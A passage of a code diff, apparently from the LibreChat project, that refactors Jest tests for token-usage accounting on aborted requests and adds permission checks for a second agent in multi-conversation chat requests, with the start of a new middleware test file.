// Clear the array to prevent double-spending
|
|
||||||
collectedUsage.length = 0;
|
|
||||||
};
|
|
||||||
|
|
||||||
it('should return early if collectedUsage is empty', async () => {
|
it('should return early if collectedUsage is empty', async () => {
|
||||||
await spendCollectedUsage({
|
await spendCollectedUsage({
|
||||||
userId: 'user-123',
|
userId: 'user-123',
|
||||||
|
|
@ -145,8 +95,7 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
fallbackModel: 'gpt-4',
|
fallbackModel: 'gpt-4',
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).not.toHaveBeenCalled();
|
expect(mockRecordCollectedUsage).not.toHaveBeenCalled();
|
||||||
expect(mockSpendStructuredTokens).not.toHaveBeenCalled();
|
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should return early if collectedUsage is null', async () => {
|
it('should return early if collectedUsage is null', async () => {
|
||||||
|
|
@ -157,28 +106,10 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
fallbackModel: 'gpt-4',
|
fallbackModel: 'gpt-4',
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).not.toHaveBeenCalled();
|
expect(mockRecordCollectedUsage).not.toHaveBeenCalled();
|
||||||
expect(mockSpendStructuredTokens).not.toHaveBeenCalled();
|
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should skip null entries in collectedUsage', async () => {
|
it('should call recordCollectedUsage with abort context and full deps', async () => {
|
||||||
const collectedUsage = [
|
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
|
||||||
null,
|
|
||||||
{ input_tokens: 200, output_tokens: 60, model: 'gpt-4' },
|
|
||||||
];
|
|
||||||
|
|
||||||
await spendCollectedUsage({
|
|
||||||
userId: 'user-123',
|
|
||||||
conversationId: 'convo-123',
|
|
||||||
collectedUsage,
|
|
||||||
fallbackModel: 'gpt-4',
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should spend tokens for single model', async () => {
|
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
||||||
|
|
||||||
await spendCollectedUsage({
|
await spendCollectedUsage({
|
||||||
|
|
@ -186,21 +117,35 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
conversationId: 'convo-123',
|
conversationId: 'convo-123',
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
fallbackModel: 'gpt-4',
|
fallbackModel: 'gpt-4',
|
||||||
|
messageId: 'msg-123',
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(1);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
||||||
expect.objectContaining({
|
{
|
||||||
context: 'abort',
|
spendTokens: expect.any(Function),
|
||||||
conversationId: 'convo-123',
|
spendStructuredTokens: expect.any(Function),
|
||||||
|
pricing: {
|
||||||
|
getMultiplier: mockGetMultiplier,
|
||||||
|
getCacheMultiplier: mockGetCacheMultiplier,
|
||||||
|
},
|
||||||
|
bulkWriteOps: {
|
||||||
|
insertMany: mockBulkInsertTransactions,
|
||||||
|
updateBalance: mockUpdateBalance,
|
||||||
|
},
|
||||||
|
},
|
||||||
|
{
|
||||||
user: 'user-123',
|
user: 'user-123',
|
||||||
|
conversationId: 'convo-123',
|
||||||
|
collectedUsage,
|
||||||
|
context: 'abort',
|
||||||
|
messageId: 'msg-123',
|
||||||
model: 'gpt-4',
|
model: 'gpt-4',
|
||||||
}),
|
},
|
||||||
{ promptTokens: 100, completionTokens: 50 },
|
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should spend tokens for multiple models (parallel agents)', async () => {
|
it('should pass context abort for multiple models (parallel agents)', async () => {
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
||||||
{ input_tokens: 80, output_tokens: 40, model: 'claude-3' },
|
{ input_tokens: 80, output_tokens: 40, model: 'claude-3' },
|
||||||
|
|
@ -214,136 +159,17 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
fallbackModel: 'gpt-4',
|
fallbackModel: 'gpt-4',
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(3);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
|
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
||||||
// Verify each model was called
|
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
|
||||||
1,
|
|
||||||
expect.objectContaining({ model: 'gpt-4' }),
|
|
||||||
{ promptTokens: 100, completionTokens: 50 },
|
|
||||||
);
|
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
|
||||||
2,
|
|
||||||
expect.objectContaining({ model: 'claude-3' }),
|
|
||||||
{ promptTokens: 80, completionTokens: 40 },
|
|
||||||
);
|
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
|
||||||
3,
|
|
||||||
expect.objectContaining({ model: 'gemini-pro' }),
|
|
||||||
{ promptTokens: 120, completionTokens: 60 },
|
|
||||||
);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should use fallbackModel when usage.model is missing', async () => {
|
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
|
||||||
|
|
||||||
await spendCollectedUsage({
|
|
||||||
userId: 'user-123',
|
|
||||||
conversationId: 'convo-123',
|
|
||||||
collectedUsage,
|
|
||||||
fallbackModel: 'fallback-model',
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'fallback-model' }),
|
|
||||||
expect.any(Object),
|
expect.any(Object),
|
||||||
);
|
expect.objectContaining({
|
||||||
});
|
context: 'abort',
|
||||||
|
|
||||||
it('should use spendStructuredTokens for OpenAI format cache tokens', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 100,
|
|
||||||
output_tokens: 50,
|
|
||||||
model: 'gpt-4',
|
|
||||||
input_token_details: {
|
|
||||||
cache_creation: 20,
|
|
||||||
cache_read: 10,
|
|
||||||
},
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await spendCollectedUsage({
|
|
||||||
userId: 'user-123',
|
|
||||||
conversationId: 'convo-123',
|
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
fallbackModel: 'gpt-4',
|
}),
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(1);
|
|
||||||
expect(mockSpendTokens).not.toHaveBeenCalled();
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'gpt-4', context: 'abort' }),
|
|
||||||
{
|
|
||||||
promptTokens: {
|
|
||||||
input: 100,
|
|
||||||
write: 20,
|
|
||||||
read: 10,
|
|
||||||
},
|
|
||||||
completionTokens: 50,
|
|
||||||
},
|
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should use spendStructuredTokens for Anthropic format cache tokens', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 100,
|
|
||||||
output_tokens: 50,
|
|
||||||
model: 'claude-3',
|
|
||||||
cache_creation_input_tokens: 25,
|
|
||||||
cache_read_input_tokens: 15,
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await spendCollectedUsage({
|
|
||||||
userId: 'user-123',
|
|
||||||
conversationId: 'convo-123',
|
|
||||||
collectedUsage,
|
|
||||||
fallbackModel: 'claude-3',
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(1);
|
|
||||||
expect(mockSpendTokens).not.toHaveBeenCalled();
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'claude-3' }),
|
|
||||||
{
|
|
||||||
promptTokens: {
|
|
||||||
input: 100,
|
|
||||||
write: 25,
|
|
||||||
read: 15,
|
|
||||||
},
|
|
||||||
completionTokens: 50,
|
|
||||||
},
|
|
||||||
);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should handle mixed cache and non-cache entries', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
|
||||||
{
|
|
||||||
input_tokens: 150,
|
|
||||||
output_tokens: 30,
|
|
||||||
model: 'claude-3',
|
|
||||||
cache_creation_input_tokens: 20,
|
|
||||||
cache_read_input_tokens: 10,
|
|
||||||
},
|
|
||||||
{ input_tokens: 200, output_tokens: 20, model: 'gemini-pro' },
|
|
||||||
];
|
|
||||||
|
|
||||||
await spendCollectedUsage({
|
|
||||||
userId: 'user-123',
|
|
||||||
conversationId: 'convo-123',
|
|
||||||
collectedUsage,
|
|
||||||
fallbackModel: 'gpt-4',
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should handle real-world parallel agent abort scenario', async () => {
|
it('should handle real-world parallel agent abort scenario', async () => {
|
||||||
// Simulates: Primary agent (gemini) + addedConvo agent (gpt-5) aborted mid-stream
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 31596, output_tokens: 151, model: 'gemini-3-flash-preview' },
|
{ input_tokens: 31596, output_tokens: 151, model: 'gemini-3-flash-preview' },
|
||||||
{ input_tokens: 28000, output_tokens: 120, model: 'gpt-5.2' },
|
{ input_tokens: 28000, output_tokens: 120, model: 'gpt-5.2' },
|
||||||
|
|
@ -356,27 +182,24 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
fallbackModel: 'gemini-3-flash-preview',
|
fallbackModel: 'gemini-3-flash-preview',
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
|
expect(mockRecordCollectedUsage).toHaveBeenCalledWith(
|
||||||
// Primary model
|
expect.any(Object),
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
expect.objectContaining({
|
||||||
1,
|
user: 'user-123',
|
||||||
expect.objectContaining({ model: 'gemini-3-flash-preview' }),
|
conversationId: 'convo-123',
|
||||||
{ promptTokens: 31596, completionTokens: 151 },
|
context: 'abort',
|
||||||
);
|
model: 'gemini-3-flash-preview',
|
||||||
|
}),
|
||||||
// Parallel model (addedConvo)
|
|
||||||
expect(mockSpendTokens).toHaveBeenNthCalledWith(
|
|
||||||
2,
|
|
||||||
expect.objectContaining({ model: 'gpt-5.2' }),
|
|
||||||
{ promptTokens: 28000, completionTokens: 120 },
|
|
||||||
);
|
);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Race condition prevention: after abort middleware spends tokens,
|
||||||
|
* the collectedUsage array is cleared so AgentClient.recordCollectedUsage()
|
||||||
|
* (which shares the same array reference) sees an empty array and returns early.
|
||||||
|
*/
|
||||||
it('should clear collectedUsage array after spending to prevent double-spending', async () => {
|
it('should clear collectedUsage array after spending to prevent double-spending', async () => {
|
||||||
// This tests the race condition fix: after abort middleware spends tokens,
|
|
||||||
// the collectedUsage array is cleared so AgentClient.recordCollectedUsage()
|
|
||||||
// (which shares the same array reference) sees an empty array and returns early.
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
||||||
{ input_tokens: 80, output_tokens: 40, model: 'claude-3' },
|
{ input_tokens: 80, output_tokens: 40, model: 'claude-3' },
|
||||||
|
|
@ -391,19 +214,16 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
fallbackModel: 'gpt-4',
|
fallbackModel: 'gpt-4',
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
expect(mockRecordCollectedUsage).toHaveBeenCalledTimes(1);
|
||||||
|
|
||||||
// The array should be cleared after spending
|
|
||||||
expect(collectedUsage.length).toBe(0);
|
expect(collectedUsage.length).toBe(0);
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should await all token spending operations before clearing array', async () => {
|
it('should await recordCollectedUsage before clearing array', async () => {
|
||||||
// Ensure we don't clear the array before spending completes
|
let resolved = false;
|
||||||
let spendCallCount = 0;
|
mockRecordCollectedUsage.mockImplementation(async () => {
|
||||||
mockSpendTokens.mockImplementation(async () => {
|
|
||||||
spendCallCount++;
|
|
||||||
// Simulate async delay
|
|
||||||
await new Promise((resolve) => setTimeout(resolve, 10));
|
await new Promise((resolve) => setTimeout(resolve, 10));
|
||||||
|
resolved = true;
|
||||||
|
return { input_tokens: 100, output_tokens: 50 };
|
||||||
});
|
});
|
||||||
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
|
|
@ -418,10 +238,7 @@ describe('abortMiddleware - spendCollectedUsage', () => {
|
||||||
fallbackModel: 'gpt-4',
|
fallbackModel: 'gpt-4',
|
||||||
});
|
});
|
||||||
|
|
||||||
// Both spend calls should have completed
|
expect(resolved).toBe(true);
|
||||||
expect(spendCallCount).toBe(2);
|
|
||||||
|
|
||||||
// Array should be cleared after awaiting
|
|
||||||
expect(collectedUsage.length).toBe(0);
|
expect(collectedUsage.length).toBe(0);
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
|
||||||
|
|
@ -1,42 +1,144 @@
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const {
|
const {
|
||||||
Constants,
|
Constants,
|
||||||
|
Permissions,
|
||||||
ResourceType,
|
ResourceType,
|
||||||
|
SystemRoles,
|
||||||
|
PermissionTypes,
|
||||||
isAgentsEndpoint,
|
isAgentsEndpoint,
|
||||||
isEphemeralAgentId,
|
isEphemeralAgentId,
|
||||||
} = require('librechat-data-provider');
|
} = require('librechat-data-provider');
|
||||||
|
const { checkPermission } = require('~/server/services/PermissionService');
|
||||||
const { canAccessResource } = require('./canAccessResource');
|
const { canAccessResource } = require('./canAccessResource');
|
||||||
|
const { getRoleByName } = require('~/models/Role');
|
||||||
const { getAgent } = require('~/models/Agent');
|
const { getAgent } = require('~/models/Agent');
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Agent ID resolver function for agent_id from request body
|
* Resolves custom agent ID (e.g., "agent_abc123") to a MongoDB document.
|
||||||
* Resolves custom agent ID (e.g., "agent_abc123") to MongoDB ObjectId
|
|
||||||
* This is used specifically for chat routes where agent_id comes from request body
|
|
||||||
*
|
|
||||||
* @param {string} agentCustomId - Custom agent ID from request body
|
* @param {string} agentCustomId - Custom agent ID from request body
|
||||||
* @returns {Promise<Object|null>} Agent document with _id field, or null if not found
|
* @returns {Promise<Object|null>} Agent document with _id field, or null if ephemeral/not found
|
||||||
*/
|
*/
|
||||||
const resolveAgentIdFromBody = async (agentCustomId) => {
|
const resolveAgentIdFromBody = async (agentCustomId) => {
|
||||||
// Handle ephemeral agents - they don't need permission checks
|
|
||||||
// Real agent IDs always start with "agent_", so anything else is ephemeral
|
|
||||||
if (isEphemeralAgentId(agentCustomId)) {
|
if (isEphemeralAgentId(agentCustomId)) {
|
||||||
return null; // No permission check needed for ephemeral agents
|
return null;
|
||||||
}
|
}
|
||||||
|
return getAgent({ id: agentCustomId });
|
||||||
return await getAgent({ id: agentCustomId });
|
|
||||||
};
|
};
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Middleware factory that creates middleware to check agent access permissions from request body.
|
* Creates a `canAccessResource` middleware for the given agent ID
|
||||||
* This middleware is specifically designed for chat routes where the agent_id comes from req.body
|
* and chains to the provided continuation on success.
|
||||||
* instead of route parameters.
|
*
|
||||||
|
* @param {string} agentId - The agent's custom string ID (e.g., "agent_abc123")
|
||||||
|
* @param {number} requiredPermission - Permission bit(s) required
|
||||||
|
* @param {import('express').Request} req
|
||||||
|
* @param {import('express').Response} res - Written on deny; continuation called on allow
|
||||||
|
* @param {Function} continuation - Called when the permission check passes
|
||||||
|
* @returns {Promise<void>}
|
||||||
|
*/
|
||||||
|
const checkAgentResourceAccess = (agentId, requiredPermission, req, res, continuation) => {
|
||||||
|
const middleware = canAccessResource({
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
requiredPermission,
|
||||||
|
resourceIdParam: 'agent_id',
|
||||||
|
idResolver: () => resolveAgentIdFromBody(agentId),
|
||||||
|
});
|
||||||
|
|
||||||
|
const tempReq = {
|
||||||
|
...req,
|
||||||
|
params: { ...req.params, agent_id: agentId },
|
||||||
|
};
|
||||||
|
|
||||||
|
return middleware(tempReq, res, continuation);
|
||||||
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Middleware factory that validates MULTI_CONVO:USE role permission and, when
|
||||||
|
* addedConvo.agent_id is a non-ephemeral agent, the same resource-level permission
|
||||||
|
* required for the primary agent (`requiredPermission`). Caches the resolved agent
|
||||||
|
* document on `req.resolvedAddedAgent` to avoid a duplicate DB fetch in `loadAddedAgent`.
|
||||||
|
*
|
||||||
|
* @param {number} requiredPermission - Permission bit(s) to check on the added agent resource
|
||||||
|
* @returns {(req: import('express').Request, res: import('express').Response, next: Function) => Promise<void>}
|
||||||
|
*/
|
||||||
|
const checkAddedConvoAccess = (requiredPermission) => async (req, res, next) => {
|
||||||
|
const addedConvo = req.body?.addedConvo;
|
||||||
|
if (!addedConvo || typeof addedConvo !== 'object' || Array.isArray(addedConvo)) {
|
||||||
|
return next();
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
if (!req.user?.role) {
|
||||||
|
return res.status(403).json({
|
||||||
|
error: 'Forbidden',
|
||||||
|
message: 'Insufficient permissions for multi-conversation',
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
if (req.user.role !== SystemRoles.ADMIN) {
|
||||||
|
const role = await getRoleByName(req.user.role);
|
||||||
|
const hasMultiConvo = role?.permissions?.[PermissionTypes.MULTI_CONVO]?.[Permissions.USE];
|
||||||
|
if (!hasMultiConvo) {
|
||||||
|
return res.status(403).json({
|
||||||
|
error: 'Forbidden',
|
||||||
|
message: 'Multi-conversation feature is not enabled',
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
const addedAgentId = addedConvo.agent_id;
|
||||||
|
if (!addedAgentId || typeof addedAgentId !== 'string' || isEphemeralAgentId(addedAgentId)) {
|
||||||
|
return next();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (req.user.role === SystemRoles.ADMIN) {
|
||||||
|
return next();
|
||||||
|
}
|
||||||
|
|
||||||
|
const agent = await resolveAgentIdFromBody(addedAgentId);
|
||||||
|
if (!agent) {
|
||||||
|
return res.status(404).json({
|
||||||
|
error: 'Not Found',
|
||||||
|
message: `${ResourceType.AGENT} not found`,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
const hasPermission = await checkPermission({
|
||||||
|
userId: req.user.id,
|
||||||
|
role: req.user.role,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
requiredPermission,
|
||||||
|
});
|
||||||
|
|
||||||
|
if (!hasPermission) {
|
||||||
|
return res.status(403).json({
|
||||||
|
error: 'Forbidden',
|
||||||
|
message: `Insufficient permissions to access this ${ResourceType.AGENT}`,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
req.resolvedAddedAgent = agent;
|
||||||
|
return next();
|
||||||
|
} catch (error) {
|
||||||
|
logger.error('Failed to validate addedConvo access permissions', error);
|
||||||
|
return res.status(500).json({
|
||||||
|
error: 'Internal Server Error',
|
||||||
|
message: 'Failed to validate addedConvo access permissions',
|
||||||
|
});
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Middleware factory that checks agent access permissions from request body.
|
||||||
|
* Validates both the primary agent_id and, when present, addedConvo.agent_id
|
||||||
|
* (which also requires MULTI_CONVO:USE role permission).
|
||||||
*
|
*
|
||||||
* @param {Object} options - Configuration options
|
* @param {Object} options - Configuration options
|
||||||
* @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share)
|
* @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share)
|
||||||
* @returns {Function} Express middleware function
|
* @returns {Function} Express middleware function
|
||||||
*
|
*
|
||||||
* @example
|
* @example
|
||||||
* // Basic usage for agent chat (requires VIEW permission)
|
|
||||||
* router.post('/chat',
|
* router.post('/chat',
|
||||||
* canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }),
|
* canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }),
|
||||||
* buildEndpointOption,
|
* buildEndpointOption,
|
||||||
|
|
@ -46,11 +148,12 @@ const resolveAgentIdFromBody = async (agentCustomId) => {
|
||||||
const canAccessAgentFromBody = (options) => {
|
const canAccessAgentFromBody = (options) => {
|
||||||
const { requiredPermission } = options;
|
const { requiredPermission } = options;
|
||||||
|
|
||||||
// Validate required options
|
|
||||||
if (!requiredPermission || typeof requiredPermission !== 'number') {
|
if (!requiredPermission || typeof requiredPermission !== 'number') {
|
||||||
throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number');
|
throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number');
|
||||||
}
|
}
|
||||||
|
|
||||||
|
const addedConvoMiddleware = checkAddedConvoAccess(requiredPermission);
|
||||||
|
|
||||||
return async (req, res, next) => {
|
return async (req, res, next) => {
|
||||||
try {
|
try {
|
||||||
const { endpoint, agent_id } = req.body;
|
const { endpoint, agent_id } = req.body;
|
||||||
|
|
@ -67,28 +170,13 @@ const canAccessAgentFromBody = (options) => {
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
// Skip permission checks for ephemeral agents
|
const afterPrimaryCheck = () => addedConvoMiddleware(req, res, next);
|
||||||
// Real agent IDs always start with "agent_", so anything else is ephemeral
|
|
||||||
if (isEphemeralAgentId(agentId)) {
|
if (isEphemeralAgentId(agentId)) {
|
||||||
return next();
|
return afterPrimaryCheck();
|
||||||
}
|
}
|
||||||
|
|
||||||
const agentAccessMiddleware = canAccessResource({
|
return checkAgentResourceAccess(agentId, requiredPermission, req, res, afterPrimaryCheck);
|
||||||
resourceType: ResourceType.AGENT,
|
|
||||||
requiredPermission,
|
|
||||||
resourceIdParam: 'agent_id', // This will be ignored since we use custom resolver
|
|
||||||
idResolver: () => resolveAgentIdFromBody(agentId),
|
|
||||||
});
|
|
||||||
|
|
||||||
const tempReq = {
|
|
||||||
...req,
|
|
||||||
params: {
|
|
||||||
...req.params,
|
|
||||||
agent_id: agentId,
|
|
||||||
},
|
|
||||||
};
|
|
||||||
|
|
||||||
return agentAccessMiddleware(tempReq, res, next);
|
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error('Failed to validate agent access permissions', error);
|
logger.error('Failed to validate agent access permissions', error);
|
||||||
return res.status(500).json({
|
return res.status(500).json({
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,509 @@
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const {
|
||||||
|
ResourceType,
|
||||||
|
SystemRoles,
|
||||||
|
PrincipalType,
|
||||||
|
PrincipalModel,
|
||||||
|
} = require('librechat-data-provider');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
const { canAccessAgentFromBody } = require('./canAccessAgentFromBody');
|
||||||
|
const { User, Role, AclEntry } = require('~/db/models');
|
||||||
|
const { createAgent } = require('~/models/Agent');
|
||||||
|
|
||||||
|
describe('canAccessAgentFromBody middleware', () => {
|
||||||
|
let mongoServer;
|
||||||
|
let req, res, next;
|
||||||
|
let testUser, otherUser;
|
||||||
|
|
||||||
|
beforeAll(async () => {
|
||||||
|
mongoServer = await MongoMemoryServer.create();
|
||||||
|
await mongoose.connect(mongoServer.getUri());
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(async () => {
|
||||||
|
await mongoose.disconnect();
|
||||||
|
await mongoServer.stop();
|
||||||
|
});
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
await mongoose.connection.dropDatabase();
|
||||||
|
|
||||||
|
await Role.create({
|
||||||
|
name: 'test-role',
|
||||||
|
permissions: {
|
||||||
|
AGENTS: { USE: true, CREATE: true, SHARE: true },
|
||||||
|
MULTI_CONVO: { USE: true },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
await Role.create({
|
||||||
|
name: 'no-multi-convo',
|
||||||
|
permissions: {
|
||||||
|
AGENTS: { USE: true, CREATE: true, SHARE: true },
|
||||||
|
MULTI_CONVO: { USE: false },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
await Role.create({
|
||||||
|
name: SystemRoles.ADMIN,
|
||||||
|
permissions: {
|
||||||
|
AGENTS: { USE: true, CREATE: true, SHARE: true },
|
||||||
|
MULTI_CONVO: { USE: true },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
testUser = await User.create({
|
||||||
|
email: 'test@example.com',
|
||||||
|
name: 'Test User',
|
||||||
|
username: 'testuser',
|
||||||
|
role: 'test-role',
|
||||||
|
});
|
||||||
|
|
||||||
|
otherUser = await User.create({
|
||||||
|
email: 'other@example.com',
|
||||||
|
name: 'Other User',
|
||||||
|
username: 'otheruser',
|
||||||
|
role: 'test-role',
|
||||||
|
});
|
||||||
|
|
||||||
|
req = {
|
||||||
|
user: { id: testUser._id, role: testUser.role },
|
||||||
|
params: {},
|
||||||
|
body: {
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: 'ephemeral_primary',
|
||||||
|
},
|
||||||
|
};
|
||||||
|
res = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn(),
|
||||||
|
};
|
||||||
|
next = jest.fn();
|
||||||
|
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('middleware factory', () => {
|
||||||
|
test('throws if requiredPermission is missing', () => {
|
||||||
|
expect(() => canAccessAgentFromBody({})).toThrow(
|
||||||
|
'canAccessAgentFromBody: requiredPermission is required and must be a number',
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('throws if requiredPermission is not a number', () => {
|
||||||
|
expect(() => canAccessAgentFromBody({ requiredPermission: '1' })).toThrow(
|
||||||
|
'canAccessAgentFromBody: requiredPermission is required and must be a number',
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('returns a middleware function', () => {
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
expect(typeof middleware).toBe('function');
|
||||||
|
expect(middleware.length).toBe(3);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('primary agent checks', () => {
|
||||||
|
test('returns 400 when agent_id is missing on agents endpoint', async () => {
|
||||||
|
req.body.agent_id = undefined;
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(400);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('proceeds for ephemeral primary agent without addedConvo', async () => {
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(res.status).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('proceeds for non-agents endpoint (ephemeral fallback)', async () => {
|
||||||
|
req.body.endpoint = 'openAI';
|
||||||
|
req.body.agent_id = undefined;
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('addedConvo — absent or invalid shape', () => {
|
||||||
|
test('calls next when addedConvo is absent', async () => {
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('calls next when addedConvo is a string', async () => {
|
||||||
|
req.body.addedConvo = 'not-an-object';
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('calls next when addedConvo is an array', async () => {
|
||||||
|
req.body.addedConvo = [{ agent_id: 'agent_something' }];
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
